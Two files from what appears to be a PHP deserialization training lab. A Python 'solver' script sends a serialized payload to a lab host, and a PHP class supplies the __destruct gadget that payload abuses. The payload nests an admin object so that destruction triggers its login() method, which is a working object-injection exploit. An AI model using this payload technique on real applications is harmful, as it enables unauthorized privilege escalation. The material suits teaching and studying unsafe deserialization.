File: code/solvers/example2.py
#!/usr/bin/python

import requests

if __name__ == '__main__':
    data = {'data': 'a:2:{s:4:"name";s:4:"User";s:4:"z123";O:26:"Examples\\Example2\\Example2":1:{s:9:"\0*\0caller";O:31:"Examples\\Example2\\Example2Admin":0:{}}}','XDEBUG_SESSION_START': 'PHPSTORM'}
    session = requests.session()

    response = session.get('http://buggy.site:8080/index.php', params=data)

    print response.text.encode('utf-8')

File: code/src/Example2/Example2.php
<?php
/**
 * Created by PhpStorm.
 * User: Taras
 * Date: 26.08.18
 * Time: 6:54 PM
 */

namespace Examples\Example2;

class Example2
{
    protected $caller;

    public function __destruct()
    {
        $this->caller->login();
    }
}
